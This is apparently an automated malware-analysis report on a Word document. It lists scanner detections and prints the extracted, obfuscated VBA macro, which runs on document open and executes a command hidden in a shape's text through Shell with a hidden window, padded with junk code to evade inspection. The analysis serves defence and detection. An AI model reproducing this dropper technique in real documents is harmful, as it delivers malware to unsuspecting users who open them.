MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Malware.Generic-6923174-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6923174-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End If tjpWcPJpbl = Shell(AtDwj + tQiaufw + qVzCiDW, oTRqZosCOY) If (KbzIEiPk <> 0 Or miadCj) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() If (AwatEnMFW <> 0 Or uEPPi) Then -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4437 bytes |
SHA-256: 6d0380f7561769cd4a37e6545d4d9efa6cbcb7e7888e080d232662039705cd93 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
43 of 82 identifiers look randomly generated (e.g. 'oTRqZosCOY') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "clHiZVOci"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cbGiXTqN()
Const oTRqZosCOY = 5070366 - 5070366
If (HYLQF <> 0 Or tFjhDzhWM) Then
tFjhDzhWM = True
IGHzi = IGHzi & CDbl(HYLQF)
If (HYLQF = 1) Then
IGHzi = IGHzi & "paizOL"
Else
IGHzi = IGHzi & "QXCYhzAo"
End If
End If
AtDwj = Shapes(1).TextFrame.ContainingRange
If (VtpRzP <> 0 Or zPzYLs) Then
zPzYLs = True
YujklGjh = YujklGjh & CByte(VtpRzP)
If (VtpRzP = 1) Then
YujklGjh = YujklGjh & "PKAZAW"
Else
YujklGjh = YujklGjh & "TCuqik"
End If
End If
If (bPlOwos <> 0 Or KnIFQE) Then
KnIFQE = True
GhobaH = GhobaH & Atn(bPlOwos)
If (bPlOwos = 1) Then
GhobaH = GhobaH & "pNcDjVQCG"
Else
GhobaH = GhobaH & "WKIWVUkd"
End If
End If
If (qlrRvOinI <> 0 Or JwQdZXlt) Then
JwQdZXlt = True
XvHhV = XvHhV & CByte(qlrRvOinI)
If (qlrRvOinI = 1) Then
XvHhV = XvHhV & "FvzlNEzD"
Else
XvHhV = XvHhV & "IEWLH"
End If
End If
tjpWcPJpbl = Shell(AtDwj + tQiaufw + qVzCiDW, oTRqZosCOY)
If (KbzIEiPk <> 0 Or miadCj) Then
miadCj = True
RYiqAv = RYiqAv & CByte(KbzIEiPk)
If (KbzIEiPk = 1) Then
RYiqAv = RYiqAv & "AzUsjr"
Else
RYiqAv = RYiqAv & "lYbZFZ"
End If
End If
If (IwoWFOV <> 0 Or owRKf) Then
owRKf = True
jqlPH = jqlPH & CDbl(IwoWFOV)
If (IwoWFOV = 1) Then
jqlPH = jqlPH & "KkmftCAFw"
Else
jqlPH = jqlPH & "wKbvP"
End If
End If
If (SlCvlLtH <> 0 Or UAamqkR) Then
UAamqkR = True
RrILQB = RrILQB & CInt(SlCvlLtH)
If (SlCvlLtH = 1) Then
RrILQB = RrILQB & "iNcDGZBA"
Else
RrILQB = RrILQB & "SwBazfS"
End If
End If
If (ipEiv <> 0 Or vRjlipln) Then
vRjlipln = True
RrLXMIcDO = RrLXMIcDO & CByte(ipEiv)
If (ipEiv = 1) Then
RrLXMIcDO = RrLXMIcDO & "DjAHjk"
Else
RrLXMIcDO = RrLXMIcDO & "wnHZCTOFq"
End If
End If
End Function
Private Sub Document_open()
If (AwatEnMFW <> 0 Or uEPPi) Then
uEPPi = True
OkpdMma = OkpdMma & Atn(AwatEnMFW)
If (AwatEnMFW = 1) Then
OkpdMma = OkpdMma & "AmzwN"
Else
OkpdMma = OkpdMma & "cBuzB"
End If
End If
If (EbcCRa <> 0 Or bpAXJ) Then
bpAXJ = True
biFlmNX = biFlmNX & CDbl(EbcCRa)
If (EbcCRa = 1) Then
biFlmNX = biFlmNX & "sSoNsUh"
Else
biFlmNX = biFlmNX & "JSNtJKIMa"
End If
End If
If (WQMQFs <> 0 Or jsYuCmqN) Then
jsYuCmqN = True
vvJzBnqwj = vvJzBnqwj & Atn(WQMQFs)
If (WQMQFs = 1) Then
vvJzBnqwj = vvJzBnqwj & "OXzSWt"
Else
vvJzBnqwj = vvJzBnqwj & "msAqTu"
End If
End If
If (SaLlbo <> 0 Or ZtwIKoRr) Then
ZtwIKoRr = True
IooZGb = IooZGb & CByte(SaLlbo)
If (SaLlbo = 1) Then
IooZGb = IooZGb & "fiJQRRat"
Else
IooZGb = IooZGb & "rBFwhh"
End If
End If
cbGiXTqN
If (miaknATa <> 0 Or YVvOGBd) Then
YVvOGBd = True
AlmTtDomQ = AlmTtDomQ & CDbl(miaknATa)
If (miaknATa = 1) Then
AlmTtDomQ = AlmTtDomQ & "UYuWCtC"
Else
AlmTtDomQ = AlmTtDomQ & "BcilU"
End If
End If
If (hYzqwncwi <> 0 Or hZUsam) Then
hZUsam = True
WcwBbCSCL = WcwBbCSCL & CByte(hYzqwncwi)
If (hYzqwncwi = 1) Then
WcwBbCSCL = WcwBbCSCL & "AALOR"
Else
WcwBbCSCL = WcwBbCSCL & "ZMirvTksa"
End If
End If
If (unwBH <> 0 Or cRwzXmW) Then
cRwzXmW = True
qrfDS = qrfDS & CInt(unwBH)
If (unwBH = 1) Then
qrfDS = qrfDS & "UITDzSm"
Else
qrfDS = qrfDS & "tibcPT"
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.